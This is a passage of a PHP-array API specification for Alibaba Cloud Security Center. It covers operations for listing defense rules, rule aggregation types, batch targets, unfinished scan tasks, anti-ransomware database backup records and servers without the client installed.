=> ['description' => 'Whether the current rule switch takes effect. Valid values:'."\n" ."\n" .'- **true**: enabled'."\n" ."\n" .'- **false**: disabled', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"C43CA30F-EF67-51BB-8C95-F31B8303****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 17\\n },\\n \\"RuleList\\": [\\n {\\n \\"Status\\": 0,\\n \\"RuleType\\": 0,\\n \\"Platform\\": \\"linux\\",\\n \\"SwitchId\\": \\"USER-ENABLE-SWITCH-TYPE_****\\",\\n \\"RuleId\\": 0,\\n \\"RuleName\\": \\"规则****\\",\\n \\"AggregationName\\": \\"初始入口\\",\\n \\"Description\\": \\"支持告警或拦截存在高危漏洞的镜像在集****\\",\\n \\"Policies\\": [\\n {\\n \\"PolicyName\\": \\"系统自启动任务****\\",\\n \\"PolicyKey\\": \\"system_auto_****\\"\\n }\\n ],\\n \\"SwitchEnable\\": true\\n }\\n ]\\n}","type":"json"}]', 'title' => 'ListSystemClientRules', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListSystemClientRules'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListSystemClientRules', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListSystemRuleAggregationTypes' => [ 'methods' => ['get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: zh. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The query result.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '1427F3BE-8A7E-57F9-BD4E-590B00D2****', 'title' => ''], 'AggregationTypeList' => [ 'description' => 'The list of rule aggregation types.', 'type' => 'array', 'items' => [ 'description' => 'The rule aggregation type.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The rule aggregation ID.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Name' => ['description' => 'The rule aggregation name.', 'type' => 'string', 'example' => '远程控制****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IdempotentParameterMismatch', 'errorMessage' => 'The request uses the same client token as a previous, but non-identical request. Do not reuse a client token with different requests, unless the requests are identical.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query aggregation types of system rules', 'summary' => 'Queries the aggregation types of system defense rules.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListSystemRuleAggregationTypes'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListSystemRuleAggregationTypes', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1427F3BE-8A7E-57F9-BD4E-590B00D2****\\",\\n \\"AggregationTypeList\\": [\\n {\\n \\"Id\\": 1,\\n \\"Name\\": \\"远程控制****\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListTargetByBatch' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list'], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page to display in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to display per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], [ 'name' => 'BatchId', 'in' => 'query', 'schema' => ['description' => 'The publish batch ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1371', 'title' => ''], ], [ 'name' => 'OperationBase', 'in' => 'query', 'schema' => ['description' => 'The asset selection dimension. Valid values:'."\n" ."\n" .'- **0**: machine instance'."\n" .'- **1**: machine group'."\n" .'- **2**: VPC-connected instance ID', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of this request, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '6EBB8614-746D-555D-AB69-C801AEC7DCE0', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page to display in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries to display per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned by the query.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], ], 'title' => '', 'example' => '', ], 'TargetList' => [ 'description' => 'The returned list.', 'type' => 'array', 'items' => ['description' => 'The asset information of the current batch, queried based on the asset selection dimension.', 'type' => 'string', 'example' => '[1001,1002]', 'title' => ''], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query targets by batch', 'summary' => 'Queries the list of publish target information for a specified batch.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListTargetByBatch'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListTargetByBatch', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"6EBB8614-746D-555D-AB69-C801AEC7DCE0\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 30\\n },\\n \\"TargetList\\": [\\n \\"[1001,1002]\\"\\n ]\\n}","type":"json"}]', ], 'ListUnfinishedOnceTask' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'TaskType', 'in' => 'query', 'schema' => ['description' => 'The task type. Valid values:'."\n" .'- **ASSETS_COLLECTION**: asset information collection task'."\n" .'- **IMAGE_SCAN**: image scan task.', 'type' => 'string', 'required' => true, 'example' => 'IMAGE_SCAN', 'title' => ''], ], [ 'name' => 'Target', 'in' => 'query', 'schema' => ['description' => 'The target object value. Valid values:'."\n" .'- If the task type is **IMAGE_SCAN**, the target object value is the **Digest** of the image.'."\n" .'- If the task type is **ASSETS_COLLECTION**, the target object value is the **Uuid** of the server.', 'type' => 'string', 'required' => false, 'example' => '4fe8e1cd-3c37-4851-b9de-124da32c****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F5CF78A7-30AA-59DB-847F-13EE3AE7****', 'title' => ''], 'OnceTasks' => [ 'description' => 'The task details.', 'type' => 'array', 'items' => [ 'description' => 'The task details.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'StatusText' => ['description' => 'The running status of the task. Valid values:'."\n" .'- **INIT**: pending'."\n" .'- **START**: started'."\n" .'- **SUCCESS**: completed'."\n" .'- **TIMEOUT**: timed out.', 'type' => 'string', 'example' => 'SUCCESS', 'title' => ''], 'Progress' => ['description' => 'The export progress percentage (%).', 'type' => 'integer', 'format' => 'int64', 'example' => '75', 'title' => ''], 'RealRunTime' => ['description' => 'The task execution time.', 'type' => 'integer', 'format' => 'int64', 'example' => '1670307567000', 'title' => ''], 'TaskName' => ['description' => 'The task name.', 'type' => 'string', 'example' => 'IMAGE_SCAN', 'title' => ''], 'Finish' => ['description' => 'Indicates whether the task is completed. Valid values:'."\n" .'- **0**: not completed'."\n" .'- **1**: completed.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries. This parameter takes effect for paged query and paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'EndTime' => ['description' => 'The end time.', 'type' => 'integer', 'format' => 'int64', 'example' => '1670307567000', 'title' => ''], 'TaskType' => ['description' => 'The task type.', 'type' => 'string', 'example' => 'IMAGE_SCAN', 'title' => ''], 'StartTime' => ['description' => 'The start time of the task execution.', 'type' => 'integer', 'format' => 'int64', 'example' => '1640102400000', 'title' => ''], 'ResultInfo' => ['description' => 'The execution result.', 'type' => 'string', 'example' => 'TASK_NOT_SUPPORT_REGION', 'title' => ''], 'Target' => ['description' => 'The task target.', 'type' => 'string', 'example' => '238cf050a7270dd6940602e70f1e5a11eeaf4e02035f445b7f613ff5e064****', 'title' => ''], 'TaskId' => ['description' => 'The task ID.', 'type' => 'string', 'example' => '9fb50f2af8bb67c9fdb684194c83****', 'title' => ''], 'FinishCount' => ['description' => 'The number of completed records.', 'type' => 'integer', 'format' => 'int32', 'example' => '67', 'title' => ''], 'TargetType' => ['description' => 'The scan object type. Valid values:'."\n" .'- **IMAGE_REPO**: image repository.'."\n" .'- **IMAGE**: image.', 'type' => 'string', 'example' => 'IMAGE', 'title' => ''], 'TaskImageInfo' => [ 'description' => 'The image scan information.', 'type' => 'object', 'properties' => [ 'RepoId' => ['description' => 'The image repository ID.', 'type' => 'string', 'example' => 'crr-r88w2vryp8m****', 'title' => ''], 'Digest' => ['description' => 'The image digest.', 'type' => 'string', 'example' => 'default_digest', 'title' => ''], 'Tag' => ['description' => 'The image tag.', 'type' => 'string', 'example' => 'v1.20-002-a2*****', 'title' => ''], 'RepoRegionId' => ['description' => 'The region ID of the image repository.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'RepoName' => ['description' => 'The image repository name.', 'type' => 'string', 'example' => 'testyyy', 'title' => ''], 'RepoNamespace' => ['description' => 'The image namespace.', 'type' => 'string', 'example' => 'bitn***', 'title' => ''], 'RegionId' => ['description' => 'The region where the server image resides.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'Image' => ['description' => 'The container image.', 'type' => 'string', 'example' => '***s.com/sas_test/baseli***', 'title' => ''], 'Pod' => ['description' => 'The image pod information.', 'type' => 'string', 'example' => 'expoit-law-****', 'title' => ''], 'AppName' => ['description' => 'The application name.', 'type' => 'string', 'example' => 'ack-jenkins-****', 'title' => ''], 'NodeName' => ['description' => 'The node name.', 'type' => 'string', 'example' => 'pztest****', 'title' => ''], 'NodeIp' => ['description' => 'The IP address of the node.', 'type' => 'string', 'example' => '172.18.XXX.XXX', 'title' => ''], 'NodeInstanceId' => ['description' => 'The node instance ID.', 'type' => 'string', 'example' => 'i-0xi5mxvtmfw9****', 'title' => ''], 'ClusterId' => ['description' => 'The cluster ID.', 'type' => 'string', 'example' => 'a765ba1435e7f9446065370e9a41****', 'title' => ''], 'ClusterName' => ['description' => 'The cluster name used to query the instance list of a specific cluster under the service.', 'type' => 'string', 'example' => 'ACK-test-****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query incomplete tasks', 'summary' => 'Queries the list of incomplete tasks by task type.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '30', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListUnfinishedOnceTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListUnfinishedOnceTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F5CF78A7-30AA-59DB-847F-13EE3AE7****\\",\\n \\"OnceTasks\\": [\\n {\\n \\"Status\\": 1,\\n \\"StatusText\\": \\"SUCCESS\\",\\n \\"Progress\\": 75,\\n \\"RealRunTime\\": 1670307567000,\\n \\"TaskName\\": \\"IMAGE_SCAN\\",\\n \\"Finish\\": 1,\\n \\"TotalCount\\": 30,\\n \\"EndTime\\": 1670307567000,\\n \\"TaskType\\": \\"IMAGE_SCAN\\",\\n \\"StartTime\\": 1640102400000,\\n \\"ResultInfo\\": \\"TASK_NOT_SUPPORT_REGION\\",\\n \\"Target\\": \\"238cf050a7270dd6940602e70f1e5a11eeaf4e02035f445b7f613ff5e064****\\",\\n \\"TaskId\\": \\"9fb50f2af8bb67c9fdb684194c83****\\",\\n \\"FinishCount\\": 67,\\n \\"TargetType\\": \\"IMAGE\\",\\n \\"TaskImageInfo\\": {\\n \\"RepoId\\": \\"crr-r88w2vryp8m****\\",\\n \\"Digest\\": \\"default_digest\\",\\n \\"Tag\\": \\"v1.20-002-a2*****\\",\\n \\"RepoRegionId\\": \\"cn-hangzhou\\",\\n \\"RepoName\\": \\"testyyy\\",\\n \\"RepoNamespace\\": \\"bitn***\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"Image\\": \\"***s.com/sas_test/baseli***\\",\\n \\"Pod\\": \\"expoit-law-****\\",\\n \\"AppName\\": \\"ack-jenkins-****\\",\\n \\"NodeName\\": \\"pztest****\\",\\n \\"NodeIp\\": \\"172.18.XXX.XXX\\",\\n \\"NodeInstanceId\\": \\"i-0xi5mxvtmfw9****\\",\\n \\"ClusterId\\": \\"a765ba1435e7f9446065370e9a41****\\",\\n \\"ClusterName\\": \\"ACK-test-****\\"\\n }\\n }\\n ]\\n}","type":"json"}]', ], 'ListUniBackupRecord' => [ 'summary' => 'List Database Backup Records', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '248537', 'abilityTreeNodes' => ['FEATUREsas7JO011'], 'autoTest' => true, 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'BackupRegionId', 'in' => 'query', 'schema' => ['description' => 'The region where the anti-ransomware backup service is located.', 'type' => 'string', 'required' => true, 'example' => 'cn-shanghai', 'title' => ''], ], [ 'name' => 'MachineRemark', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The identification information of the server protected by the anti-ransomware policy. You can enter the IP address or instance ID of the server.', 'type' => 'string', 'required' => false, 'example' => '1.1.XX.XX'], ], [ 'name' => 'State', 'in' => 'query', 'schema' => ['description' => 'Backup status. Values:'."\n" .'- **completed**: Success'."\n" .'- **error**: Failure'."\n" .'- **canceled**: Closed', 'type' => 'string', 'required' => false, 'example' => 'completed', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'When performing a paginated query, set the page number for the current page. The default value is **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The maximum number of data entries to display per page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'maximum' => '200', 'minimum' => '10', 'example' => '20'], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is a unique identifier generated by Alibaba Cloud for this request and can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => '09969D2C-4FAD-429E-BFBF-9A60DEF8****', 'title' => ''], 'UniBackupRecordList' => [ 'description' => 'List of database backup records.', 'type' => 'array', 'items' => [ 'description' => 'Database backup record.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '5d13e7cf-8074-4ffe-ab3b-1046565a****', 'title' => ''], 'InstanceUuid' => ['description' => 'The unique ID of the database instance on the server.', 'type' => 'string', 'example' => '18d04f2a496811ef800000163e13****', 'title' => ''], 'Subtype' => ['description' => 'Backup type. Values:'."\n" ."\n" .'- *full*: Full backup'."\n" .'- *incremental*: Incremental backup', 'type' => 'string', 'example' => 'full', 'title' => ''], 'DatabaseType' => ['description' => 'Database type. Values:'."\n" ."\n" .'- **MYSQL**'."\n" .'- **ORACLE**'."\n" .'- **MSSQL**', 'type' => 'string', 'example' => 'MYSQL', 'title' => ''], 'BackupStartTime' => ['description' => 'The start time of the backup, in timestamp format (in milliseconds).', 'type' => 'integer', 'format' => 'int64', 'example' => '1729071306', 'title' => ''], 'BackupEndTime' => ['description' => 'The end time of the backup, in timestamp format (in milliseconds).', 'type' => 'integer', 'format' => 'int64', 'example' => '1729071307', 'title' => ''], 'DatabaseName' => ['description' => 'The name of the database.', 'type' => 'string', 'example' => 'test_MySQL11', 'title' => ''], 'State' => ['description' => 'Backup status. Values:'."\n" .'- **completed**: Success'."\n" .'- **error**: Failure'."\n" .'- **canceled**: Closed', 'type' => 'string', 'example' => 'completed', 'title' => ''], 'ErrorMessageList' => [ 'description' => 'List of backup error messages.', 'type' => 'array', 'items' => ['description' => 'Backup error message.', 'type' => 'string', 'example' => 'Inner Error.', 'title' => ''], 'title' => '', 'example' => '', ], 'InstanceName' => ['description' => 'Server name.', 'type' => 'string', 'example' => 'launch-advisor-20190410', 'title' => ''], 'Ip' => ['description' => 'The IP of the server.'."\n" ."\n" .'> If a public IP exists, this value is the public IP; if no public IP but a private IP exists, then it is the private IP.'."\n", 'type' => 'string', 'example' => '1.1.1.1', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the server.', 'type' => 'string', 'example' => 'i-2zee6ru2t8xbzix6****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '1.1.1.1'."\n", 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '192.168.1.1', 'title' => ''], 'RegionId' => ['description' => 'The ID of the region where the instance is located.', 'type' => 'string', 'example' => 'cn-shanghai', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'Page information for pagination queries.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a pagination query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of items displayed per page in a pagination query.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of records in the query result.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'Count' => ['description' => 'The number of items displayed on the current page in a pagination query.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'List Database Backup Records', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListUniBackupRecord'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListUniBackupRecord', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"09969D2C-4FAD-429E-BFBF-9A60DEF8****\\",\\n \\"UniBackupRecordList\\": [\\n {\\n \\"Uuid\\": \\"5d13e7cf-8074-4ffe-ab3b-1046565a****\\",\\n \\"InstanceUuid\\": \\"18d04f2a496811ef800000163e13****\\",\\n \\"Subtype\\": \\"full\\",\\n \\"DatabaseType\\": \\"MYSQL\\",\\n \\"BackupStartTime\\": 1729071306,\\n \\"BackupEndTime\\": 1729071307,\\n \\"DatabaseName\\": \\"test_MySQL11\\",\\n \\"State\\": \\"completed\\",\\n \\"ErrorMessageList\\": [\\n \\"Inner Error.\\"\\n ],\\n \\"InstanceName\\": \\"launch-advisor-20190410\\",\\n \\"Ip\\": \\"1.1.1.1\\",\\n \\"InstanceId\\": \\"i-2zee6ru2t8xbzix6****\\",\\n \\"InternetIp\\": \\"1.1.1.1\\\\n\\",\\n \\"IntranetIp\\": \\"192.168.1.1\\",\\n \\"RegionId\\": \\"cn-shanghai\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 10,\\n \\"Count\\": 10\\n }\\n}","type":"json"}]', 'translator' => 'machine', ], 'ListUninstallAegisMachines' => [ 'summary' => 'Queries information about assets that do not have the client installed.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '180.113.XX.XX', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page in a paged query. Default value: **5**, which indicates that 5 entries are displayed per page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '5', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the first page to display in the query results. Default value: **1**, which indicates that the query results are displayed from page 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '4', 'title' => ''], ], [ 'name' => 'RegionNo', 'in' => 'query', 'schema' => ['description' => 'The region where the server resides.'."\n" ."\n" .'> You can call the [DescribeCriteria](~~DescribeCriteria~~) operation to obtain supported regions from the **Values** of the item whose **Name** is **regionId**.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'Os', 'in' => 'query', 'schema' => ['description' => 'The operating system.'."\n" .'> You can call the [DescribeCriteria](~~DescribeCriteria~~) operation to obtain supported operating systems from the **Values** of the item whose **Name** is **osType**.', 'type' => 'string', 'required' => false, 'example' => 'linux', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The asset information to query. You can set this parameter to the asset name or public IP address.', 'type' => 'string', 'required' => false, 'example' => '172.20.XX.XX', 'title' => ''], ], [ 'name' => 'Vendor', 'in' => 'query', 'schema' => ['description' => 'The server vendor. Valid values:'."\n" ."\n" .'- **0**: Alibaba Cloud asset'."\n" .'- **1**: non-cloud asset'."\n" .'- **2**: IDC asset'."\n" .'- **3**, **4**, **5**, **7**: third-party cloud asset'."\n" .'- **8**: lightweight asset.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'RegionIdStr', 'in' => 'query', 'schema' => ['description' => 'The region where the server resides.'."\n" ."\n" .'> You can call the [DescribeCriteria](~~DescribeCriteria~~) operation to obtain supported regions from the **Values** of the item whose **Name** is **regionId**.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '151F6EB6-D5F3-417A-AF7B-4D84975DB586', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '44', 'title' => ''], 'MachineList' => [ 'description' => 'The list of server information.', 'type' => 'array', 'items' => [ 'description' => 'The server information.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '6d5b361f-958d-48a8-a9d2-d6e82c1****', 'title' => ''], 'MachineRegion' => ['description' => 'The region where the server resides.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '120.79.XX.XX', 'title' => ''], 'VendorName' => ['description' => 'The name of the server vendor.'."\n" ."\n" .'Valid values:'."\n" .'- **ALIYUN**: Alibaba Cloud'."\n" .'- **OUT**: non-cloud asset'."\n" .'- **IDC**: IDC'."\n" .'- **TENCENT**: third-party cloud'."\n" .'- **HUAWEICLOUD**: third-party cloud'."\n" .'- **Microsoft**: third-party cloud'."\n" .'- **AWS**: third-party cloud'."\n" .'- **TRIPARTITE**: lightweight server.', 'type' => 'string', 'example' => 'ALIYUN', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server instance.', 'type' => 'string', 'example' => 'sql-test-001', 'title' => ''], 'Os' => ['description' => 'The operating system of the server. Valid values:'."\n" ."\n" .'- **linux**: linux'."\n" ."\n" .'- **windows**: windows'."\n" ."\n" .'- **windows-2003**: windows-2003.', 'type' => 'string', 'example' => 'linux', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the server instance.', 'type' => 'string', 'example' => 'sas-bdrvxb4b****', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'Vendor' => ['description' => 'The server vendor. Valid values:'."\n" ."\n" .'- **0**: Alibaba Cloud asset'."\n" .'- **1**: non-cloud asset'."\n" .'- **2**: IDC asset'."\n" .'- **3**, **4**, **5**, **7**: third-party cloud asset'."\n" .'- **8**: lightweight asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RegionId' => ['description' => 'The ID of the region where the server resides.', 'type' => 'string', 'example' => 'cn-shanghai', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query assets without the client installed', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' 